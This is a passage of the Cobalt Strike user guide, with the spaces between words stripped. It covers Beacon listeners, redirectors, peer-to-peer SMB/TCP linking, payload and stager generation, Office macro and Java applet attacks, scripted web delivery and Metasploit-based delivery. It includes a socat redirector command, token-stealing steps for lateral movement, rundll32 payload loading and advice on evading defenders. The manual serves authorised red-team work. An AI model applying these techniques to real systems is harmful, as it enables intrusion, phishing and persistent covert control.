ListenerandInfrastructureManagement/HTTPBeaconandHTTPSBeacon Manual HTTP Proxy Configuration The(Manual) Proxy Settingsdialogoffersseveraloptionstocontroltheproxyconfiguration forBeacon’sHTTPandHTTPSrequests.ThedefaultbehaviorofBeaconistousetheInternet Explorerproxyconfigurationforthecurrentprocess/usercontext. figure28-ManualProxySettings TheTypefieldconfiguresthetypeofproxy.TheHostandPortfieldstellBeaconwherethe proxylives.TheUsernameandPasswordfieldsareoptional.Thesefieldsspecifythe credentialsBeaconusestoauthenticatetotheproxy. ChecktheIgnore proxy settings; use direct connectionboxtoforceBeacontoattemptits HTTPandHTTPSrequestswithoutgoingthroughaproxy. PressSet toupdatetheBeacondialogwiththedesiredproxysettings.PressReset tosetthe proxyconfigurationbacktothedefaultbehavior. NOTE: ThemanualproxyconfigurationaffectstheHTTPandHTTPSBeaconpayloadstagesonly. Itdoesnotpropagatetothepayloadstagers. Redirectors Aredirectorisasystemthatsitsbetweenyourtarget’snetworkandyourteamserver.Any connectionsthatcometotheredirectorareforwardedtoyourteamservertoprocess.A redirectorisawaytoprovidemultiplehostsforyourBeaconpayloadstocallhometo.A CobaltStrikeUserGuide www.fortra.com page:55
ListenerandInfrastructureManagement/SMBBeacon redirectoralsoaidsoperationalsecurityasitmakesithardertotracethetruelocationofyour teamserver. CobaltStrike’slistenermanagementfeaturessupporttheuseofredirectors.Simplyspecify yourredirectorhostswhenyousetupanHTTPorHTTPSBeaconlistener.CobaltStrikedoes notvalidatethisinformation.Ifthehostyouprovideisnotaffiliatedwiththecurrenthost,Cobalt Strikeassumesit’saredirector.Onesimplewaytoturnaserverintoaredirectoristousesocat. Here’sthesocatsyntaxtoforwardallconnectionsonport80totheteamserverat 192.168.12.100onport80: socat TCP4-LISTEN:80,fork TCP4:192.168.12.100:80 SMB Beacon TheSMBBeaconusesnamedpipestocommunicatethroughaparentBeacon.Thispeer-to- peercommunicationworkswithBeaconsonthesamehost.Italsoworksacrossthenetwork. WindowsencapsulatesnamedpipecommunicationwithintheSMBprotocol.Hence,thename, SMBBeacon. SMB Listener Setup TocreateaSMBBeaconlistenerselectCobalt Strike -> Listenersonthemainmenuandpress theAddbuttonatthebottomoftheListenerstabdisplay. TheSMBBeaconiscompatiblewithmostactionsinCobaltStrikethatspawnapayload.The exceptiontothisaretheuser-drivenattacksthatrequireexplicitstagers. CobaltStrikepost-exploitationandlateralmovementactionsthatspawnapayloadwillattempt toassumecontrolof(link)totheSMBBeaconpayloadforyou.IfyouruntheSMBBeacon manually,youwillneedtolinktoitfromaparentBeacon. TheNewListenerpaneldisplays. CobaltStrikeUserGuide www.fortra.com page:56
ListenerandInfrastructureManagement/SMBBeacon figure29-SMBBeacon SelectBeacon SMBasthePayloadtypeandgivethelisteneraName.Makesuretogivethe newlisteneramemorablenameasthisnameishowyouwillrefertothislistenerthrough CobaltStrike’scommandsandworkflows. Parameters Pipename (C2)-Setanexplicitpipenameoracceptthedefaultoption. Guardrails -BeaconGuardrailsallowstheusertocreateawaytorestrictthetargets thatthebeaconcanexecuteon.Onceconfigured,thesevalueswillbethedefault guardrailfortheStagelessorWindowsStagelessPayloadGenerators. Pressthe...buttontoopentheGuardrailsSettings: CobaltStrikeUserGuide www.fortra.com page:57
ListenerandInfrastructureManagement/SMBBeacon figure30-GuardrailSettings IP Address:EnteraspecificIPAddressorgenericwildcardoftherightmost segments.Forexample: l 123.123.123.123 l 123.123.123.* l 123.123.. l 123...* User Name:Enteraspecificname,oravaluethat: l “startswith”supportedby“”wildcardcharacterontherightside l “endswith”supportedby“”wildcardcharacterontheleftside Theguardiscase-insensitive. Server Name:Enteraspecificcomputername,oravaluethat: l “startswith”supportedby“”wildcardcharacterontherightside l “endswith”supportedby“”wildcardcharacterontheleftside Theguardiscase-insensitive Domain:Enteraspecificdomain,oravaluethat: l “startswith”supportedby“”wildcardcharacterontherightside l “endswith”supportedby“”wildcardcharacterontheleftside Theguardiscase-insensitive CobaltStrikeUserGuide www.fortra.com page:58
ListenerandInfrastructureManagement/TCPBeacon Linking and Unlinking FromtheBeaconconsole,uselink [host] [pipe] tolinkthecurrentBeacontoanSMBBeacon thatiswaitingforaconnection.WhenthecurrentBeaconchecksin,itslinkedpeerswillcheckin too. Toblendinwithnormaltraffic,linkedBeaconsuseWindowsnamedpipestocommunicate. ThistrafficisencapsulatedintheSMBprotocol.Thereareafewcaveatstothisapproach:
- HostswithanSMBBeaconmustacceptconnectionsonport445.
- YoumayonlylinkBeaconsmanagedbythesameCobaltStrikeinstance. Ifyougetanerror5(accessdenied)afteryoutrytolinktoaBeacon:stealadomainuser’stoken orusemake_token DOMAIN\user password topopulateyourcurrenttokenwithvalid credentialsforthetarget.TrytolinktotheBeaconagain. TodestroyaBeaconlinkuseunlink [ip address] [session PID] intheparentorchild.The [sessionPID]argumentistheprocessIDoftheBeacontounlink.Thisvalueishowyouspecifya specificBeacontode-linkwhentherearemultiplechildrenBeacons. Whenyoude-linkanSMBBeacon,itdoesnotexitandgoaway.Instead,itgoesintoastate whereitwaitsforaconnectionfromanotherBeacon.Youmayusethelinkcommandto resumecontroloftheSMBBeaconfromanotherBeaconinthefuture. TCP Beacon TheTCPBeaconusesaTCPsockettocommunicatethroughaparentBeacon.Thispeer-to- peercommunicationworkswithBeaconsonthesamehostandacrossthenetwork. TCP Listener Setup TocreateaTCPBeaconlistenerselectCobalt Strike -> Listenersonthemainmenuandpress theAddbuttonatthebottomoftheListenerstabdisplay. TheNewListenerpaneldisplays. CobaltStrikeUserGuide www.fortra.com page:59
ListenerandInfrastructureManagement/TCPBeacon figure31-TCPBeacon SelectBeacon TCPasthePayloadtypeandgivethelisteneraName.Makesuretogivethe newlisteneramemorablenameasthisnameishowyouwillrefertothislistenerthrough CobaltStrike’scommandsandworkflows. TheTCPBeaconconfiguredinthiswayisabindpayload.Abindpayloadisonethatwaitsfora connectionfromitscontroller(inthiscase,anotherBeaconsession). Parameters Port (C2)-ThisoptioncontrolstheporttheTCPBeaconwillwaitforconnectionson. Bind to localhost only-ChecktohavetheTCPBeaconbindto127.0.0.1whenit listensforaconnection.ThisisagoodoptionifyouusetheTCPBeaconfor localhost-onlyactions. Guardrails -BeaconGuardrailsallowstheusertocreateawaytorestrictthetargets thatthebeaconcanexecuteon.Onceconfigured,thesevalueswillbethedefault guardrailfortheStagelessorWindowsStagelessPayloadGenerators. Pressthe...buttontoopentheGuardrailsSettings: CobaltStrikeUserGuide www.fortra.com page:60
ListenerandInfrastructureManagement/TCPBeacon figure32-GuardrailSettings IP Address:EnteraspecificIPAddressorgenericwildcardoftherightmost segments.Forexample: l 123.123.123.123 l 123.123.123.* l 123.123.. l 123...* User Name:Enteraspecificname,oravaluethat: l “startswith”supportedby“”wildcardcharacterontherightside l “endswith”supportedby“”wildcardcharacterontheleftside Theguardiscase-insensitive. Server Name:Enteraspecificcomputername,oravaluethat: l “startswith”supportedby“”wildcardcharacterontherightside l “endswith”supportedby“”wildcardcharacterontheleftside Theguardiscase-insensitive Domain:Enteraspecificdomain,oravaluethat: l “startswith”supportedby“”wildcardcharacterontherightside l “endswith”supportedby“”wildcardcharacterontheleftside Theguardiscase-insensitive CobaltStrikeUserGuide www.fortra.com page:61
ListenerandInfrastructureManagement/ExternalC2 TheTCPBeaconiscompatiblewithmostactionsinCobaltStrikethatspawnapayload.The exceptiontothisare,similartotheSMBBeacon,theuser-drivenattacksthatrequireexplicit stagers. CobaltStrikepost-exploitationandlateralmovementactionsthatspawnapayloadwillattempt toassumecontrolof(connect)totheTCPBeaconpayloadforyou.IfyouruntheTCPBeacon manually,youwillneedtoconnecttoitfromaparentBeacon. Connecting and Unlinking FromtheBeaconconsole,useconnect [ip address] [port] toconnectthecurrentsessiontoa TCPBeaconthatiswaitingforaconnection.Whenthecurrentsessionchecksin,itslinked peerswillcheckintoo. TodestroyaBeaconlinkuseunlink [ip address] [session PID] intheparentorchildsession console.Later,youmayreconnecttotheTCPBeaconfromthesamehost(oradifferenthost). External C2 ExternalC2isaspecificationtoallowthird-partyprogramstoactasacommunicationlayerfor CobaltStrike’sBeaconpayload.Thesethird-partyprogramsconnecttoCobaltStriketoread framesdestinedfor,andwriteframeswithoutputfrompayloadscontrolledinthisway.The ExternalC2serveriswhatthesethird-partyprogramsusetointerfacewithyourCobaltStrike teamserver. External C2 Listener Setup TocreateanExternalC2BeaconlistenerselectCobalt Strike -> Listenersonthemainmenu andpresstheAddbuttonatthebottomoftheListenerstabdisplay. TheNewListenerpaneldisplays. GotoCobalt Strike ->Listeners,pressAdd,andchooseExternalC2asyourpayload. CobaltStrikeUserGuide www.fortra.com page:62
ListenerandInfrastructureManagement/ExternalC2 figure33-ExternalC2 SelectExternal C2asthePayloadtypeandgivethelisteneraName.Makesuretogivethenew listeneramemorablenameasthisnameishowyouwillrefertothislistenerthroughCobalt Strike’scommandsandworkflows. Parameters Port (Bind)-SpecifytheporttheExternalC2serverwaitsforconnectionson. Bind to localhost only-ChecktomaketheExternalC2serverlocalhost-only. NOTE: ExternalC2listenersarenotlikeotherCobaltStrikelisteners.Youcannottargetthesewith CobaltStrike’spost-exploitationactions.Thisoptionisjustaconvienencetostandupthe interfaceitself. Specification TheExternalC2interfaceisdescribedintheExternalC2specification. CobaltStrikeUserGuide www.fortra.com page:63
ListenerandInfrastructureManagement/ForeignListeners l ExternalC2Specification l extc2example.c Ifyou'dliketoadapttheexample(AppendixB)inthespecificationintoathird-partyC2,youmay assumea3-clauseBSDlicenseforthecodecontainedwithinthespecification. Third-party Materials Here'salistofthird-partyprojectsandpoststhatreference,use,orbuildonExternalC2: l Custom CommandandControl(C3)byF-SecureLabs.Aframeworkforrapid prototypingofcustom C2channels. l external_c2_frameworkbyJonathanEchavarria.APythonFrameworkforbuilding ExternalC2clientsandservers. l ExternalC2LibrarybyRyanHanson.NETlibrarywithWebAPI,WebSockets,andadirect socket.Includesunittestsandcomments. l TaskingOffice365forCobaltStrikeC2byMWR Labs.DiscussionanddemoofOffice 365C2forCobaltStrike. l SharedFileC2byOutflankBV.POCtouseafile/shareforcommandandcontrol. Foreign Listeners CobaltStrikesupportstheconceptofforeignlisteners.Thesearealiasesforx86 payload handlers hostedintheMetasploitFrameworkorotherinstancesofCobaltStrike.Topassa WindowsHTTPSMeterpretersessiontoafriendwithmsfconsole,setupaForeignHTTPS payloadandpointtheHostandPortvaluestotheirhandler.Youmayuseforeignlisteners anywhereyouwoulduseanx86CobaltStrikelistener. Foreign Listeners Setup TocreateaForeignBeaconlistenerselectCobalt Strike -> Listenersonthemainmenuand presstheAddbuttonatthebottomoftheListenerstabdisplay. TheNewListenerpaneldisplays. CobaltStrikeUserGuide www.fortra.com page:64
ListenerandInfrastructureManagement/InfrastructureConsolidation figure34-ForeignHTTP SelectForeign HTTPorForeign HTTPSasthePayloadtypeandgivethelisteneraName. Makesuretogivethenewlisteneramemorablenameasthisnameishowyouwillrefertothis listenerthroughCobaltStrike’scommandsandworkflows. Parameters HTTP(S) Host (Stager)-Thisfieldspecifiesthenameoftheserverwhereyourforeign listenerislocated. HTTP(S) Port (Stager)-Thisfieldspecifiestheportontheserverwhereyourforeign listenerislisteningforconnections. Infrastructure Consolidation CobaltStrike’smodelfordistributedoperationsistostandupaseparateteamserverforeach phaseofyourengagement.Forexample,itmakessensetoseparateyourpost-exploitationand persistenceinfrastructure.Ifapost-exploitationactionisdiscovered,youdon’twantthe remediationofthatinfrastructuretoclearoutthecallbacksthatwillletyoubackintothe network. CobaltStrikeUserGuide www.fortra.com page:65
ListenerandInfrastructureManagement/InfrastructureConsolidation Someengagementphasesrequiremultipleredirectorandcommunicationchanneloptions. CobaltStrike4.0isfriendlytothis. figure35-InfrastructureConsolidationFeatures YoucanbindmultipleHTTP,HTTPS,andDNSlistenerstoasingleCobaltStriketeamserver. Thesepayloadsalsosupportportbendingintheirconfiguration.Thisallowsyoutousethe commonportforyourchannel(80,443,or53)inyourredirectorandC2setups,butbindthese listenerstodifferentportstoavoidportconflictsonyourteamserversystem. Togivevarietytoyournetworkindicators,CobaltStrike’sMalleableC2profilesmaycontain multiplevariants.Avariantisawayofaddingvariationsofthecurrentprofileintooneprofilefile. YoumayspecifyaProfilevariantwhenyoudefineeachHTTPorHTTPSBeaconlistener. Further,youcandefinemultipleTCPandSMBBeaconsononeteamserver,eachwithdifferent pipeandportconfigurations.AnyegressBeacon,fromthesameteamserver,cancontrolanyof theseTCPorSMBBeaconpayloadsoncethey’redeployedinthetargetenvironment. CobaltStrikeUserGuide www.fortra.com page:66
InitialAccess/Client-sideSystemProfiler Initial Access CobaltStrikehasseveraloptionsthataidinestablishinganinitialfootholdonatarget.This rangesfromprofilingpotentialtargetstopayloadcreationtopayloaddelivery. Client-side System Profiler Thesystemprofilerisareconnaissancetoolforclient-sideattacks.Thistoolstartsalocalweb- serverandfingerprintsanyonewhovisitsit.Thesystemprofilerprovidesalistofapplications andpluginsitdiscoversthroughtheuser’sbrowser.Thesystemprofileralsoattemptsto discovertheinternalIPaddressofuserswhoarebehindaproxyserver. Tostartthesystemprofiler,gotoAttacks -> System Profiler.Tostarttheprofileryoumust specifyaURItobindtoandaporttostarttheCobaltStrikeweb-serverfrom. IfyouspecifyaRedirectURL,CobaltStrikewillredirectvisitorstothisURLoncetheirprofileis taken.ClickLaunch tostartthesystemprofiler. TheSystemProfilerusesanunsignedJavaApplettodecloakthetarget’sinternalIPaddress anddeterminewhichversionofJavathetargethas.WithJava’sclick-to-runsecurityfeature— thiscouldraisesuspicion.UnchecktheUse Java Applettogetinformationboxtoremovethe JavaAppletfromtheSystemProfiler. ChecktheEnable SSLboxtoservetheSystemProfileroverSSL.Thisboxisdisabledunless youspecifyavalidSSLcertificatewithMalleableC2.Chapter11discussesthis. Application Browser Toviewtheresultsfromthesystemprofiler,gotoView->Applications.Thisopensan ApplicationstabwithatableshowingallapplicationinformationcapturedbytheSystem Profiler. Analyst Tips TheApplicationBrowserhasalotofinformationusefultoplanatargetedattack.Here'showto getthemostoutofthisoutput: TheinternalIPaddressfieldisgatheredfromabenignunsignedJavaapplet.Ifthisfieldsays unknown,thismeanstheJavaappletprobablydidnotrun.IfyouseeanIPaddresshere,this meanstheunsignedJavaappletran. CobaltStrikeUserGuide www.fortra.com page:67
InitialAccess/CobaltStrikeWebServices InternetExplorerwillreportthebaseversiontheuserinstalled.AsInternetExplorergets updates--thereportedversioninformationdoesnotchange.CobaltStrikeusestheJScript.dll versiontoestimateInternetExplorer'spatchlevel.Gotosupport.microsoft.comandsearchfor JScript.dll'sbuildnumber(thethirdnumberintheversionstring)tomapittoanInternet Explorerupdate. A*64nexttoanapplicationmeansit'sanx64application. Cobalt Strike Web Services ManyCobaltStrikefeaturesrunfromtheirownwebserver.Theseservicesincludethesystem profiler,HTTPBeacon,andCobaltStrike’swebdrive-byattacks.It’sOKtohostmultipleCobalt Strikefeaturesononewebserver. TomanageCobaltStrike’swebservices,gotoView ->Web Drive-by ->Manage.Here,youmay copyanyCobaltStrikeURLtotheclipboardorstopaCobaltStrikewebservice. UseView ->Web Log tomonitorvisitstoyourCobaltStrikewebservices. IfCobaltStrike’swebserverseesarequestfromtheLynx,Wget,orCurlbrowser;CobaltStrike willautomaticallyreturna404page.CobaltStrikedoesthisaslightprotectionagainstblue teamsnooping.ThecanbeconfiguredwiththeMalleableC2‘.http-config.block_useragents’ option. User-driven Attack Packages Thebestattacksarenotexploits.Rather,thebestattackstakeadvantageofnormalfeaturesto getcodeexecution.CobaltStrikemakesiteasytosetupseveraluser-drivenattacks.These attackstakeadvantageoflistenersyou’vealreadysetup.NavigateinthemenutoPayloadsand chooseoneofthefollowingoptions. HTML Application AnHTMLApplicationisaWindowsprogramwrittenInHTMLandanInternetExplorer supportedscriptinglanguage.ThispackagegeneratesanHTMLApplicationthatrunsaCobalt Strikelistener. NavigatetoPayloads -> HTML Application. CobaltStrikeUserGuide www.fortra.com page:68
InitialAccess/User-drivenAttackPackages figure36-HTML ApplicationAttack Parameters Listener-Pressthe...buttontoselectaCobaltStrikelisteneryouwouldliketooutput apayloadfor. Method-Usethedrop-downtoselectoneofthefollowingmethodstoruntheselected listener: Executable:Thismethodwritesanexecutabletodiskandrunit. PowerShell:ThismethodusesaPowerShellone-linertorunyourpayloadstager. VBA:ThismethodusesaMicrosoftOfficemacrotoinjectyourpayloadinto memory.TheVBAmethodrequiresMicrosoftOfficeonthetargetsystem. PressGeneratetocreatetheHTMLApplication. MS Office Macro TheMicrosoftOfficeMacrotoolgeneratesamacrotoembedintoaMicrosoftWordor MicrosoftExceldocument. NavigatetoPayloads -> MS Office Macro. CobaltStrikeUserGuide www.fortra.com page:69
InitialAccess/User-drivenAttackPackages figure37-MSOfficeMacro ChoosealistenerandpressGeneratetocreatethestep-by-stepinstructionstoembedyour macrointoaMicrosoftWordorExceldocument. Thisattackworkswellwhenyoucanconvinceausertorunmacroswhentheyopenyour document. Payload Generator CobaltStrike'sPayloadGeneratoroutputssourcecodeandartifactstostageaCobaltStrike listenerontoahost.ThinkofthisastheCobaltStrikeversionofmsfvenom. NavigatetoPayloads -> Stager Payload Generator. CobaltStrikeUserGuide www.fortra.com page:70
InitialAccess/User-drivenAttackPackages figure38-PayloadGenerator Parameters Listener-Pressthe...buttontoselectaCobaltStrikelisteneryouwouldliketooutput apayloadfor. Output-Usethedrop-downtoselectoneofthefollowingoutputtypes(mostoptions giveyoushellcodeformattedasabytearrayforthatlanguage): C:Shellcodeformattedasabytearray. C#:Shellcodeformattedasabytearray. COM Scriptlet:A.sctfiletorunalistener Java:Shellcodeformattedasabytearray. Perl:Shellcodeformattedasabytearray. PowerShell:PowerShellscripttorunshellcode PowerShell Command:PowerShellone-linertorunaBeaconstager. Python:Shellcodeformattedasabytearray. Raw:blobofpositionindependentshellcode. Ruby:Shellcodeformattedasabytearray. Veil:CustomshellcodesuitableforusewiththeVeilEvasionFramework. VBA:Shellcodeformattedasabytearray. x64-Checktheboxtogenerateanx64stagerfortheselectedlistener. PressGeneratetocreateaPayloadfortheselectedoutputtype. Payload Generator (stageless) CobaltStrike'sPayloadGeneratoroutputssourcecodeandartifacts,withoutastager,toa CobaltStrikelistenerontoahost. NavigatetoPayloads -> Stageless Payload Generator. CobaltStrikeUserGuide www.fortra.com page:71
InitialAccess/User-drivenAttackPackages figure39-StagelessPayloadGenerator Parameters Listener-Pressthe...buttontoselectaCobaltStrikelisteneryouwouldliketooutput apayloadfor. Guardrails-Ifyourlistenerhasbeenconfiguredwithgauardrails,thevalueisdisplayed asthedefault.Usethe...buttontooverridethesettingsforthebeacon. CobaltStrikeUserGuide www.fortra.com page:72
InitialAccess/User-drivenAttackPackages figure40-GuardrailSettings Output-Usethedrop-downtoselectoneofthefollowingoutputtypes(mostoptions giveyoushellcodeformattedasabytearrayforthatlanguage): C:Shellcodeformattedasabytearray. C#:Shellcodeformattedasabytearray. Java:Shellcodeformattedasabytearray. Perl:Shellcodeformattedasabytearray. Python:Shellcodeformattedasabytearray. Raw:blobofpositionindependentshellcode. Ruby:Shellcodeformattedasabytearray. VBA:Shellcodeformattedasabytearray. Exit Function-Thisfunctiondeterminesthemethod/behaviorthatBeaconuseswhen theexitcommandisexecuted. Process:Terminatesthewholeprocess. Thread:Terminatesonlythecurrentthread. System Call-Selectoneofthefollowingsystemcallmethodstouseatexecutiontime whengeneratingastagelessbeaconpayloadfromtheCobaltStrikeUIora supportedaggressorfunction: None:UsethestandardWindowsAPIfunction. CobaltStrikeUserGuide www.fortra.com page:73
InitialAccess/User-drivenAttackPackages Direct:UsetheNtversionofthefunction. Indirect:JumptotheappropriateinstructionwithintheNtversionofthe function. HTTP Library--SelecttheMicrosoftlibrary(WinINetorWinHTTP)forthegenerated payload. x64-Checktheboxtogenerateanx64stagerfortheselectedlistener. PressGeneratetocreateaPayloadfortheselectedoutputtype. Windows Executable ThispackagegeneratesaWindowsexecutableartifactthatdeliversapayloadstager. NavigatetoPayloads -> Windows Stager Payload. figure41-WindowExecutable Thispackageprovidesthefollowingoutputoptions: Parameters CobaltStrikeUserGuide www.fortra.com page:74
InitialAccess/User-drivenAttackPackages Listener-Pressthe...buttontoselectaCobaltStrikelisteneryouwouldliketooutput apayloadfor. Output-Usethedrop-downtoselectoneofthefollowingoutputtypes. Windows EXE:AWindowsexecutable. Windows Service EXE:AWindowsexecutablethatrespondstoServiceControl Managercommands.YoumayusethisexecutabletocreateaWindows servicewithscorasacustomexecutablewiththeMetasploitFramework’s PsExecmodules. Windows DLL:AWindowsDLLthatexportsaStartWfunctionthatiscompatible withrundll32.exe.Userundll32.exetoloadyourDLLfromthecommandline. rundll32 foo.dll,StartW x64-Checktheboxtogeneratex64artifactsthatpairwithanx64stager.Bydefault, thisdialogexportsx64payloadstagers. sign-ChecktheboxtosignanEXEorDLLartifactwithacode-signingcertificate.You mustspecifyacertificateinaMalleableC2profile. PressGeneratetocreateapayloadstagerartifact. CobaltStrikeusesitsArtifactKittogeneratethisoutput. Windows Executable (Stageless) ThispackageexportsBeacon,withoutastager,asanexecutable,serviceexecutable,32-bitDLL, or64-bitDLL.Apayloadartifactthatdoesnotuseastageriscalledastagelessartifact.This packagealsohasaPowerShelloptiontoexportBeaconasaPowerShellscriptandarawoption toexportBeaconasablobofpositionindependentcode. NavigatetoPayloads -> Windows Stageless Payload. CobaltStrikeUserGuide www.fortra.com page:75
InitialAccess/User-drivenAttackPackages figure42-WindowsStagelessExecutable Thispackageprovidesthefollowingoutputoptions: Parameters Listener-Pressthe...buttontoselectaCobaltStrikelisteneryouwouldliketooutput apayloadfor. Guardrails-Ifyourlistenerhasbeenconfiguredwithgauardrails,thevalueisdisplayed asthedefault.Usethe...buttontooverridethesettingsforthebeacon. CobaltStrikeUserGuide www.fortra.com page:76
InitialAccess/User-drivenAttackPackages figure43-GuardrailSettings Output-Usethedrop-downtoselectoneofthefollowingoutputtypes. PowerShell:APowerShellscriptthatinjectsastagelessBeaconintomemory. Raw:AblobofpositionindependentcodethatcontainsBeacon. Windows EXE:AWindowsexecutable. Windows Service EXE:AWindowsexecutablethatrespondstoServiceControl Managercommands.YoumayusethisexecutabletocreateaWindows servicewithscorasacustomexecutablewiththeMetasploitFramework's PsExecmodules. Windows DLL:AWindowsDLLthatexportsaStartWfunctionthatiscompatible withrundll32.exe.Userundll32.exetoloadyourDLLfromthecommandline. rundll32 foo.dll,StartW Exit Function-Thisfunctiondeterminesthemethod/behaviorthatBeaconuseswhen theexitcommandisexecuted. Process:Terminatesthewholeprocess. Thread:Terminatesonlythecurrentthread. System Call-Selectoneofthefollowingsystemcallmethodstouseatexecutiontime whengeneratingastagelessbeaconpayloadfromtheCobaltStrikeUIora supportedaggressorfunction: None:UsethestandardWindowsAPIfunction. CobaltStrikeUserGuide www.fortra.com page:77
InitialAccess/User-drivenAttackPackages Direct:UsetheNtversionofthefunction. Indirect:JumptotheappropriateinstructionwithintheNtversionofthe function. HTTP Library--SelecttheMicrosoftlibrary(WinINetorWinHTTP)forthegenerated payload. x64-Checktheboxtogenerateanx64artifactthatcontainsanx64payload.By default,thisdialogexportsx64payloads. sign-ChecktheboxtosignanEXEorDLLartifactwithacode-signingcertificate.You mustspecifyacertificateinaMalleableC2profile. PressGeneratetocreateastagelessartifact. CobaltStrikeusesitsArtifactKittogeneratethisoutput. Windows Executable (Stageless)Variants Thisoptiongeneratesallofthestagelesspayloads(inx86andx64)foralloftheconfigured listeners. NavigatetoPayloads -> Windows Stageless Generate All Payloads. figure44-WindowsStagelessExecutableVariants Parameters CobaltStrikeUserGuide www.fortra.com page:78
InitialAccess/HostingFiles Folder-Pressthefolderbuttontoselectalocationtosavethelistener(s). System Call-Selectoneofthefollowingsystemcallmethodstouseatexecutiontime whengeneratingastagelessbeaconpayloadfromtheCobaltStrikeUIora supportedaggressorfunction: None:UsethestandardWindowsAPIfunction. Direct:UsetheNtversionofthefunction. Indirect:JumptotheappropriateinstructionwithintheNtversionofthe function. HTTP Library--SelecttheMicrosoftlibrary(WinINetorWinHTTP)forthegenerated payload. Sign-ChecktheboxtosignanEXEorDLLartifactwithacode-signingcertificate.You mustspecifyacertificateinaMalleableC2profile. PressGeneratetocreateastagelessartifact. Hosting Files CobaltStrike’swebservercanhostyouruser-drivenpackagesforyou.Fromthemenu,select Site Management -> Host Fileandperformthefollowingtosetup:
- Choosethefiletohost
- SelectanarbitraryURL
- Choosethemimetypeforthefile. Byitself,thecapabilitytohostafileisn’tveryimpressive.However,insectionsthatfollow,you willlearnhowtoembedCobaltStrikeURLsintoaspearphishingemail.Whenyoudothis, CobaltStrikecancross-referencevisitorstoyourfilewithsentemailsandincludethis informationinthesocialengineeringreport. CheckEnable SSLtoservethiscontentoverSSL.Thisoptionisavailablewhenyouspecifya validSSLcertificateinyourMalleableC2profile. User-driven Web Drive-by Attacks CobaltStrikeUserGuide www.fortra.com page:79
InitialAccess/User-drivenWebDrive-byAttacks CobaltStrikemakesseveraltoolstosetupwebdrive-byattacksavailabletoyou.Toquicklystart anattack,navigatetoAttacksandchooseoneofthefollowingoption: Java Signed Applet Attack Thisattackstartsawebserverhostingaself-signedJavaapplet.Visitorsareaskedtogivethe appletpermissiontorun.Whenavisitorgrantsthispermission,yougainaccesstotheirsystem. TheJavaSignedAppletAttackusesCobaltStrike’sJavainjector.OnWindows,theJavainjector willinjectshellcodeforaWindowslistenerdirectlyintomemoryforyou. NavigatetoAttacks -> Signed Applet Attack. figure45-SignedAppletAttack Parameters Local URL/Host/Path-SettheLocalURLPath,HostandPorttoconfigurethe webserver. Listener-Pressthe...buttontoselectaCobaltStrikelisteneryouwouldliketooutput apayloadfor. SSL-ChecktoservethiscontentoverSSL.Thisoptionisavailablewhenyouspecifya validSSLcertificateinyourMalleableC2profile. PressLaunchtostarttheattack. CobaltStrikeUserGuide www.fortra.com page:80
InitialAccess/User-drivenWebDrive-byAttacks Java Smart Applet Attack CobaltStrike’sSmartAppletAttackcombinesseveralexploitstodisabletheJavasecurity sandboxintoonepackage.ThisattackstartsawebserverhostingaJavaapplet.Initially,this appletrunsinJava’ssecuritysandboxanditdoesnotrequireuserapprovaltostart. TheappletanalyzesitsenvironmentanddecideswhichJavaexploittouse.IftheJavaversion isvulnerable,theappletwilldisablethesecuritysandbox,andexecuteapayloadusingCobalt Strike’sJavainjector. NavigatetoAttacks -> Smart Applet Attack. figure46-SmartAppletAttack Parameters Local URL/Host/Path-SettheLocalURLPath,HostandPorttoconfigurethe webserver. Listener-Pressthe...buttontoselectaCobaltStrikelisteneryouwouldliketooutput apayloadfor. SSL-ChecktoservethiscontentoverSSL.Thisoptionisavailablewhenyouspecifya validSSLcertificateinyourMalleableC2profile. PressLaunchtostarttheattack. Scripted Web Delivery (S) CobaltStrikeUserGuide www.fortra.com page:81
InitialAccess/User-drivenWebDrive-byAttacks ThisfeaturegeneratesastagelessBeaconpayloadartifact,hostsitonCobaltStrike’sweb server,andpresentsaone-linertodownloadandruntheartifact. NavigatetoAttacks -> Scripted Web Delivery (S)fromthemenu. figure47-ScrptedWebDelivery(S) Parameters Local URL/Host/Path-SettheLocalURLPath,HostandPorttoconfigurethe webserver.MakesuretheHostfieldmatchestheCNfieldofyourSSLcertificate. Thiswillavoidasituationwherethisfeaturefailsbecauseofamismatch betweenthesefields. Listener-Pressthe...buttontoselectaCobaltStrikelisteneryouwouldliketooutput apayloadfor. Type-Usethedrop-downmenutoselectoneofthefollowingtypes: bitsadmin :Thisoptionhostsanexecutableandusesbitsadmintodownloadit. Thebitsadminmethodrunstheexecutableviacmd.exe. exe :ThisoptiongeneratesanexecutableandhostsitonCobaltStrike’sweb server. CobaltStrikeUserGuide www.fortra.com page:82
InitialAccess/Client-sideExploits powershell ThisoptionhostsaPowerShellscriptandusespowershell.exeto downloadthescriptandevaluateit. powershell IEX :ThisoptionhostsaPowerShellscriptandusespowershell.exe todownloadthescriptandevaluateit.Similartopriorpowershell option,but itprovidesashorterInvoke-Executionone-linercommand. python : ThisoptionhostsaPythonscriptandusespython.exetodownloadthe scriptandrunit.EachoftheseoptionsisadifferentwaytorunaCobaltStrike listener. x64-Checktheboxtogenerateanx64stagerfortheselectedlistener. SSL-ChecktoservethiscontentoverSSL.Thisoptionisavailablewhenyouspecifya validSSLcertificateinyourMalleableC2profile. PressLaunchtostarttheattack. Client-side Exploits YoumayuseaMetasploitFrameworkexploittodeliveraCobaltStrikeBeacon.CobaltStrike’s BeaconiscompatiblewiththeMetasploitFramework’sstagingprotocol.TodeliveraBeacon withaMetasploitFrameworkexploit: l Usewindows/meterpreter/reverse_http[s]asyourPAYLOADandsetLHOSTandLPORT topointtoyourCobaltStrikelistener.You’renotreallydeliveringMeterpreterhere,you’re tellingtheMetasploitFrameworktogeneratetheHTTP[s]stagerthatdownloadsa payloadfrom thespecifiedLHOST/LPORT. l SetDisablePayloadHandlertoTrue.ThiswilltelltheMetasploitFrameworktoavoid standingupahandlerwithintheMetasploitFrameworktoserviceyourpayload connection. l SetPrependMigratetoTrue.ThisoptiontellstheMetasploitFrameworktoprepend shellcodethatrunsthepayloadstagerinanotherprocess.ThishelpsyourBeacon sessionsurvivesiftheexploitedapplicationcrashesorifit’sclosedbyauser. Here’sascreenshotofmsfconsoleusedtostandupaFlashExploittodeliverCobaltStrike’s HTTPBeaconhostedat192.168.1.5onport80: CobaltStrikeUserGuide www.fortra.com page:83
